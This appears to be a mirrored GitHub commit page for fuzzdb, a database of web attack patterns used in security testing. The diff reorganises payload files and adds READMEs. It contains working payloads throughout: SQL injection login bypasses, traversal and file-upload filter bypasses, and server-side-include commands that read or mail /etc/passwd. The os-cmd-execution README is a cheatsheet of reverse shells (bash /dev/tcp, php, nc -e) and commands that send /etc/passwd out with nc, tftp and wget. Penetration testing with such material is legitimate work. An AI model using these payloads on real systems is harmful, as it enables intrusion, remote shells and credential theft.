mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
doc relocation and renaming update
This commit is contained in:
parent
b3e506dab1
commit
a58bdb659d
1318 changed files with 323 additions and 182163 deletions
BIN
._readme.txt.kate-swp
Normal file
BIN
._readme.txt.kate-swp
Normal file
Binary file not shown.
4
.directory
Normal file
4
.directory
Normal file
|
@ -0,0 +1,4 @@
|
|||
[Dolphin]
|
||||
Timestamp=2015,9,11,16,15,10
|
||||
Version=3
|
||||
ViewMode=1
|
|
@ -1,4 +1,4 @@
|
|||
Copyright (c) 2010-2013, Adam Muntner
|
||||
Copyright (c) 2010-2015, Adam Muntner
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
|
61
_readme.txt
61
_readme.txt
|
@ -1,61 +0,0 @@
|
|||
fuzzdb: Web Fuzzing Discovery and Attack Pattern Database
|
||||
|
||||
****Introduction
|
||||
|
||||
Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.
|
||||
|
||||
This is especially useful for many filter bypass type exploits. Identical encoding sequences have been observed to bypass filters for more than one application. Examples can be observed in categories including xss, sqli, evil script upload, OS command execution, traversal issues, directory indexing bugs, source code revealing vulnerabilities, etc. In recent times, for example, new embedded webservers were discovered to be vulnerable to directory traversal issues triggered by encodings that exploited Microsoft IIS in 2000.
|
||||
|
||||
This approach is also useful for targeted use of brute force for discovery using, for example, lists of known vulnerable scripts sorted by platform type, default locations of critical files of popular apps, high quality lists of common directory names.
|
||||
|
||||
Primary sources used for attack pattern research:
|
||||
|
||||
-researching old web exploits for repeatable attack strings
|
||||
-penetration tests i've performed in the past
|
||||
-scraping scanner patterns from my own http logs
|
||||
-various books, articles, blog posts
|
||||
-documentation for popular applications
|
||||
-analysis of default application installs
|
||||
|
||||
notable sources and other contributors:
|
||||
-metasploit wmap http://www.metasploit.com/redmine/projects/framework/wiki/WMAP
|
||||
-dirb http://www.open-labs.org/
|
||||
-jbrofuzz http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
|
||||
-skipfish http://code.google.com/p/skipfish/
|
||||
-rsnake's xss and rfi files http://ha.ckers.org/
|
||||
-michael daw's web shell archive http://michaeldaw.org/
|
||||
-joseph giron (joseph.giron13 (at) gmail.com)
|
||||
-ron gutierrez - html tags and javascript events
|
||||
-analysis of default app installs
|
||||
-lists already submitted to OWASP Fuzzing Code DB by Wagner Elias, Eduardo Neves, Ulisses Castro, Adam Muntner http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=News
|
||||
|
||||
Some files are derived primarily from other fuzzers, and are credited in the files with comments formatted like:
|
||||
|
||||
# This file is primarily derived from source xyz
|
||||
|
||||
Others have additional instructions for payload use in a similar comment format at the top of the file
|
||||
|
||||
****Download
|
||||
|
||||
Check out via svn:
|
||||
|
||||
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
|
||||
|
||||
Or, pick from a plethora of available svn clients: http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients
|
||||
|
||||
Tarballs are available for download, but may not be as fresh as whats in the svn repo.
|
||||
|
||||
Browse the repo http://code.google.com/p/fuzzdb/source/browse/#svn/trunk
|
||||
|
||||
|
||||
****Usage
|
||||
|
||||
I primarily use fuzzdb in the excellent OWASP ZAP (https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) and in Burp Suite Pro (http://portswigger.net/suite/), however, it can be used in any web application/service fault injection tool, for manual testing as an interesting source of test cases for fuzzing binary applications, in IDS signatures, and more.
|
||||
|
||||
|
||||
****Who
|
||||
|
||||
This SVN repository and the files were assembled by Adam Muntner who works as a Security Engineer at Mozilla Corp.
|
||||
|
||||
contact: unix23 (@) gmail.com
|
||||
|
|
@ -1,8 +0,0 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
|
@ -1,12 +0,0 @@
|
|||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
|
@ -1,9 +0,0 @@
|
|||
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
|
||||
{ASPSCRIPT}
|
||||
{ASPSCRIPT}.{EXT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.{EXT}
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}%00.{EXT}
|
||||
{ASPSCRIPT}::data%00.
|
||||
{ASPSCRIPT}::data%00.{EXT}
|
|
@ -1,11 +0,0 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
#<?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php::$DATA
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
||||
{PHPSCRIPT}::$DATA
|
|
@ -1,9 +0,0 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
# your own payload, or <?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
|
@ -1,32 +0,0 @@
|
|||
# File Upload Fuzzfile 1.0 - File Name Filter Bypass
|
||||
# creative commons license http://creativecommons.org/licenses/by/3.0/
|
||||
# see:
|
||||
# http://cwe.mitre.org/data/definitions/434.html
|
||||
|
||||
# projurl
|
||||
|
||||
# For MIME filter bypass, your shellscript should look like
|
||||
# -------
|
||||
# GIF89aP;
|
||||
# [shell]
|
||||
# -------
|
||||
#
|
||||
# Check to see if there are no extension checks at all
|
||||
#
|
||||
# Check to see if the file upload protection is client side only.
|
||||
#
|
||||
# For mod_cgi Server Side Include upload attacks:
|
||||
#<!--#exec cmd="ls" -->
|
||||
#
|
||||
#or, on Windows
|
||||
#
|
||||
#<!--#exec cmd="dir" -->
|
||||
#
|
||||
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
# try setting .jpg to executable. If you can set the target directory, try fuzz the
|
||||
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
#
|
||||
# example .htaccess that sets mime type .jpg to be executable:
|
||||
# -----
|
||||
# AddType application/x-httpd-php .jpg
|
||||
# -----
|
|
@ -1,2 +0,0 @@
|
|||
# Invalid filenames - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
|
|
@ -1,14 +0,0 @@
|
|||
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
# fuzz these into a filename during upload attempts
|
||||
*
|
||||
.
|
||||
"
|
||||
/
|
||||
\
|
||||
[
|
||||
]
|
||||
:
|
||||
;
|
||||
|
|
||||
=
|
||||
,
|
|
@ -1,27 +0,0 @@
|
|||
\boot.ini
|
||||
\WINDOWS\win.ini
|
||||
\WINNT\win.ini
|
||||
\WINDOWS\Repair\SAM
|
||||
\WINDOWS\php.ini
|
||||
\WINDOWS\system32\drivers\etc\hosts
|
||||
\WINNT\php.ini
|
||||
\php\php.ini
|
||||
\php5\php.ini
|
||||
\php4\php.ini
|
||||
\apache\php\php.ini
|
||||
\xampp\apache\bin\php.ini
|
||||
\home2\bin\stable\apache\php.ini
|
||||
\home\bin\stable\apache\php.ini
|
||||
\Program Files\Apache Group\Apache\logs\access.log
|
||||
\Program Files\Apache Group\Apache\logs\error.log
|
||||
\Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
\Program Files\xampp\apache\conf\httpd.conf
|
||||
\Program Files\FileZilla Server\FileZilla Server.xml
|
||||
\Program Files (x86)\Apache Group\Apache\logs\access.log
|
||||
\Program Files (x86)\Apache Group\Apache\logs\error.log
|
||||
\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
|
||||
\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
|
||||
\Program Files (x86)\xampp\apache\conf\httpd.conf
|
||||
\Program Files (x86)\FileZilla Server\FileZilla Server.xml
|
||||
\AppServ\MySQL\data\mysql\user.MYD
|
|
@ -1,3 +0,0 @@
|
|||
other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
|
@ -1,4 +0,0 @@
|
|||
# list of potentially useful dos commands to fuzz inside an os command execution bug
|
||||
ver
|
||||
chdir
|
||||
echo %USERNAME%
|
|
@ -1,8 +0,0 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
|
@ -1,3 +0,0 @@
|
|||
Other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
|
@ -1,8 +0,0 @@
|
|||
# regex replace as many as you can with your fuzzer for best results:
|
||||
# <user-fieldname> <pass-fieldname> <username>
|
||||
# also try to brute force a list of possible usernames, including possile admin acct names
|
||||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
5
attack/.directory
Normal file
5
attack/.directory
Normal file
|
@ -0,0 +1,5 @@
|
|||
[Dolphin]
|
||||
HeaderColumnWidths=288,60,115
|
||||
Timestamp=2015,9,11,16,20,26
|
||||
Version=3
|
||||
ViewMode=1
|
4
attack/business-logic/.directory
Normal file
4
attack/business-logic/.directory
Normal file
|
@ -0,0 +1,4 @@
|
|||
[Dolphin]
|
||||
Timestamp=2015,9,11,16,22,7
|
||||
Version=3
|
||||
ViewMode=1
|
|
@ -1,4 +1,3 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
13
attack/disclosure-source/README.md
Normal file
13
attack/disclosure-source/README.md
Normal file
|
@ -0,0 +1,13 @@
|
|||
Notes:
|
||||
|
||||
source-disc-cmd-exec-traversal.txt
|
||||
single directory traversals that have caused showcode or command exec issues in the past
|
||||
GET /path/*payload*relative/path/to/target/file/
|
||||
|
||||
source-disclosure-generic.txt
|
||||
known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
|
||||
source-disclosure-microsoft.txt
|
||||
microsoft-specific - appends after filename - try the generic list for microsoft, too
|
||||
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
11
attack/disclosure-source/source-disclosure-generic.txt
Normal file
11
attack/disclosure-source/source-disclosure-generic.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
|
@ -20,4 +20,8 @@ jacco\ van"someting"tuijl\example@address.com
|
|||
“email”@address.com
|
||||
sql"or"1"="1"or"test@email.com
|
||||
sql'or'1'='1'or'test@email.com
|
||||
xss"><script>alert(1)</script><"test@address.com
|
||||
xss"><script>alert(1)</script><"test@address.com
|
||||
a"b(c)d,e:f;g<h>i[j\k]l@example.com
|
||||
this is"not\allowed@example.com
|
||||
notallowed@example.com
|
||||
notallowed@example.com
|
4
attack/file-upload/.directory
Normal file
4
attack/file-upload/.directory
Normal file
|
@ -0,0 +1,4 @@
|
|||
[Dolphin]
|
||||
Timestamp=2015,9,11,17,25,0
|
||||
Version=3
|
||||
ViewMode=1
|
74
attack/file-upload/README.md
Normal file
74
attack/file-upload/README.md
Normal file
|
@ -0,0 +1,74 @@
|
|||
# File Upload Fuzzfiles- File Name Filter Bypass Notes
|
||||
|
||||
see: http://cwe.mitre.org/data/definitions/434.html
|
||||
|
||||
# kinds of file upload verifications:
|
||||
# content-type
|
||||
# filename extension verificationi (whitelist, blacklist)
|
||||
# file content checking
|
||||
# client side, ha ha ha
|
||||
|
||||
File notes:
|
||||
|
||||
alt-extensions-asp.fuzz.txt
|
||||
alt-extensions-coldfusion.fuzz.txt
|
||||
alt-extensions-jsp.fuzz.txt
|
||||
alt-extensions-perl.fuzz.txt
|
||||
alt-extensions-php.fuzz.txt
|
||||
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
|
||||
|
||||
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
|
||||
# File directory names that experience has shown are often writable
|
||||
|
||||
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
|
||||
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
|
||||
|
||||
file-ul-filter-bypass-microsoft-asp.fuzz.txt
|
||||
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
|
||||
|
||||
file-ul-filter-bypass-ms-php.fuzz.txt
|
||||
file-ul-filter-bypass-x-platform-php.fuzz.txt
|
||||
# php on microsoft, cross-platform. use both on ms.
|
||||
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
#<?php phpinfo(); ?>
|
||||
#-----
|
||||
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
|
||||
|
||||
|
||||
invalid-filenames-microsoft.fuzz.txt
|
||||
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
|
||||
# regex replace {EXT} with allowed extension type
|
||||
|
||||
file-ul-filter-bypass-x-platform-generic.fuzz.txt
|
||||
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
|
||||
# regex replace {PHPSCRIPT} with your script name
|
||||
|
||||
|
||||
invalid-filenames-linux.fuzz.txt
|
||||
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
|
||||
|
||||
invalid-filesystem-chars-microsoft.fuzz.txt
|
||||
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
# fuzz these into a filename during upload attempts
|
||||
|
||||
|
||||
|
||||
## Addtl Tips:
|
||||
|
||||
# For mod_cgi Server Side Include upload attacks:
|
||||
<!--#exec cmd="ls" -->
|
||||
|
||||
# or, on Windows
|
||||
|
||||
<!--#exec cmd="dir" -->
|
||||
|
||||
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
|
||||
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
|
||||
# example .htaccess entry that sets mime type .jpg to be executable:
|
||||
-----
|
||||
AddType application/x-httpd-php .jpg
|
||||
-----
|
|
@ -0,0 +1,8 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT}.{EXT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.{EXT}
|
||||
{ASPSCRIPT}%00
|
||||
{ASPSCRIPT}%00.{EXT}
|
||||
{ASPSCRIPT}::data%00.
|
||||
{ASPSCRIPT}::data%00.{EXT}
|
|
@ -1,4 +1,3 @@
|
|||
# this file contains a number of common predictable values. Add more if other file ttypes are allowed, or use the filetype-bf version of this fuzzfile
|
||||
{ASPSCRIPT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.jpg
|
7
attack/file-upload/file-ul-filter-bypass-ms-php.fuzz.txt
Normal file
7
attack/file-upload/file-ul-filter-bypass-ms-php.fuzz.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php::$DATA
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
||||
{PHPSCRIPT}::$DATA
|
|
@ -0,0 +1,5 @@
|
|||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
7
attack/file-upload/invalid-filenames-linux.fuzz.txt
Normal file
7
attack/file-upload/invalid-filenames-linux.fuzz.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
/
|
||||
|
||||
\0
|
||||
/dev/null
|
||||
/dev/null/foo
|
||||
.
|
||||
..
|
|
@ -1,5 +1,3 @@
|
|||
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
|
||||
# regex replace {EXT} with allowed extension type
|
||||
CON.{EXT}
|
||||
PRN.{EXT}
|
||||
AUX.{EXT}
|
|
@ -0,0 +1,12 @@
|
|||
*
|
||||
.
|
||||
"
|
||||
/
|
||||
\
|
||||
[
|
||||
]
|
||||
:
|
||||
;
|
||||
|
|
||||
=
|
||||
,
|
|
@ -1,4 +1,3 @@
|
|||
# derived from fuzz file by Foobar@email.de
|
||||
%s%p%x%d
|
||||
%p%p%p%p
|
||||
%x%x%x%x
|
|
@ -1,4 +1,3 @@
|
|||
# integer overflows from jbrofuzz
|
||||
-1
|
||||
0
|
||||
0x100
|
17
attack/lfi/README.md
Normal file
17
attack/lfi/README.md
Normal file
|
@ -0,0 +1,17 @@
|
|||
LFI - Local File Include attacks
|
||||
|
||||
To exploit an LFI bug, you need to be able to write code to a local file and call it from the include. HTTPD log files are a location that is typically writable.
|
||||
|
||||
common-unix-httpd-log-locations.fuzz.txt
|
||||
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common unix logfile locations based on common packages formats.
|
||||
|
||||
common-windows-httpd-log-locations.fuzz.txt
|
||||
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common windows logfile locations based on common packages formats.
|
||||
|
||||
For more details:
|
||||
http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
|
||||
other tools:
|
||||
fimap http://code.google.com/p/fimap/
|
||||
|
||||
|
6
attack/lfi/common-ms-httpd-log-locations.fuzz.txt
Normal file
6
attack/lfi/common-ms-httpd-log-locations.fuzz.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
\Program Files\Apache Group\Apache\logs\access.log
|
||||
\Program Files\Apache Group\Apache\logs\error.log
|
||||
\Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
\Program Files (x86)\Apache Group\Apache\logs\access.log
|
||||
\Program Files (x86)\Apache Group\Apache\logs\error.log
|
|
@ -1,4 +1,3 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
4
attack/os-cmd-execution/.directory
Normal file
4
attack/os-cmd-execution/.directory
Normal file
|
@ -0,0 +1,4 @@
|
|||
[Dolphin]
|
||||
Timestamp=2015,9,11,18,18,9
|
||||
Version=3
|
||||
ViewMode=1
|
|
@ -1,10 +1,63 @@
|
|||
One-liner reverse shells...
|
||||
Remote Command Exec Cheatsheet
|
||||
|
||||
File notes:
|
||||
|
||||
source-disc-cmd-exec-traversal.fuzz.txt
|
||||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
|
||||
|
||||
Executing Commands
|
||||
|
||||
Seperating Commands:
|
||||
blah;blah2
|
||||
|
||||
PIPEZ:
|
||||
blah ^ blah2
|
||||
|
||||
AND:
|
||||
blah && blah2
|
||||
|
||||
OR:
|
||||
FAIL || X
|
||||
|
||||
OR:
|
||||
blah%0Dblah2%0Dblah3
|
||||
|
||||
Backtick:
|
||||
`blah`
|
||||
|
||||
Background:
|
||||
`blah & blah2`
|
||||
|
||||
|
||||
|
||||
Exfiltrating Files / Data
|
||||
|
||||
FTP:
|
||||
Make a new text file, and echo and then redirect to FTP
|
||||
|
||||
NC:
|
||||
nc -e /bin/sh
|
||||
|
||||
NC:
|
||||
echo /etc/passwd | nc host port
|
||||
|
||||
TFTP:
|
||||
echo put /etc/passwd | tftp host
|
||||
|
||||
WGET:
|
||||
wget --post-file /etc/passwd
|
||||
|
||||
|
||||
|
||||
One-Liner Reverse Shells
|
||||
|
||||
|
||||
On the listener:
|
||||
$ nc -l -p 8080 -vvv
|
||||
|
||||
On the remote host...
|
||||
|
||||
Bash:
|
||||
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
|
||||
|
@ -25,7 +78,6 @@ $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|||
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
|
||||
|
||||
Netcat:
|
||||
|
||||
$ nc -e /bin/sh 10.0.0.1 1234
|
||||
|
||||
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
|
@ -39,3 +91,4 @@ $ xhost +targetip
|
|||
|
||||
|
||||
|
||||
More docs: /docs/attack-docs/remote-cmd-exfiltration/
|
|
@ -0,0 +1,6 @@
|
|||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
|
@ -1,4 +1,3 @@
|
|||
# list of potentially useful unix commands to fuzz inside an os command execution bug
|
||||
uname -n -s
|
||||
whoami
|
||||
pwd
|
3
attack/os-cmd-execution/useful-commands-windows.fuzz.txt
Normal file
3
attack/os-cmd-execution/useful-commands-windows.fuzz.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
ver
|
||||
chdir
|
||||
echo %USERNAME%
|
4
attack/path-traversal/README.md
Normal file
4
attack/path-traversal/README.md
Normal file
|
@ -0,0 +1,4 @@
|
|||
|
||||
traversals-8-deep-exotic-encoding.fuzz.txt
|
||||
# Use Regex to replace {FILE} with your target filename
|
||||
|
|
@ -1,6 +1,3 @@
|
|||
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
|
||||
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
|
||||
# separate fuzzfile for more flexibiity
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
14
attack/rfi/README.md
Normal file
14
attack/rfi/README.md
Normal file
|
@ -0,0 +1,14 @@
|
|||
rfi.fuzz.txt
|
||||
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
|
||||
# Change XXpathXX to the path of your backdoor. Note that you may need to
|
||||
# try it against every directory on the target and because of how this was
|
||||
# culled you may need to add a question mark to your own XXpathXX URL:
|
||||
# Eg: XXpathXX => http://www.example.com/hax.txt?
|
||||
|
||||
|
||||
see:
|
||||
/docs/attack-docs/rfi-cheatsheet.html
|
||||
|
||||
Other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
|
@ -1,8 +1,3 @@
|
|||
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
|
||||
# Change XXpathXX to the path of your backdoor. Note that you may need to
|
||||
# try it against every directory on the target and because of how this was
|
||||
# culled you may need to add a question mark to your own XXpathXX URL:
|
||||
# Eg: XXpathXX => http://www.example.com/hax.txt?
|
||||
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
|
||||
/123flashchat.php?e107path=XXpathXX
|
||||
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
|
|
@ -1,5 +1,4 @@
|
|||
# includes work by Foobar@email.de
|
||||
<!--#exec cmd="/bin/ls /" --><br/>
|
||||
<!--#exec cmd="cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="find / -name *.* -print" --><br/>
|
||||
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
|
|
@ -1,4 +1,3 @@
|
|||
# from wapiti
|
||||
sleep(__TIME__)#
|
||||
1 or sleep(__TIME__)#
|
||||
" or sleep(__TIME__)#
|
|
@ -1,4 +1,3 @@
|
|||
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
'create user name identified by 'pass123' --
|
||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
|
@ -1,4 +1,3 @@
|
|||
# contains statements from jbrofuzz (13 April 2010)
|
||||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
|
@ -1,4 +1,3 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
9
attack/sql-injection/detect/README.md
Normal file
9
attack/sql-injection/detect/README.md
Normal file
|
@ -0,0 +1,9 @@
|
|||
|
||||
MSSQL.fuzz.txt
|
||||
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -1,4 +1,3 @@
|
|||
# contains statements from jbrofuzz
|
||||
’ or ‘1’=’1
|
||||
' or '1'='1
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
|
@ -1,5 +1,3 @@
|
|||
# to attempt with ids/waf evasion try like
|
||||
# /index.aspx?page=select 1&page=2,3 from table where id=1
|
||||
<>"'%;)(&+
|
||||
|
|
||||
!
|
18
attack/sql-injection/exploit/README.md
Normal file
18
attack/sql-injection/exploit/README.md
Normal file
|
@ -0,0 +1,18 @@
|
|||
|
||||
various useful post-exploitation commands
|
||||
|
||||
ms-sql-enumeration.fuzz.txt
|
||||
# ms-sqli info disclosure payload fuzzfile
|
||||
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||
# might need to terminate payloads with ;--
|
||||
|
||||
|
||||
mysql-injection-login-bypass.fuzz.txt
|
||||
# regex replace as many as you can with your fuzzer for best results:
|
||||
# <user-fieldname> <pass-fieldname> <username>
|
||||
# also try to brute force a list of possible usernames, including possile admin acct names
|
||||
|
||||
mysql-read-local-files.fuzz.txt
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue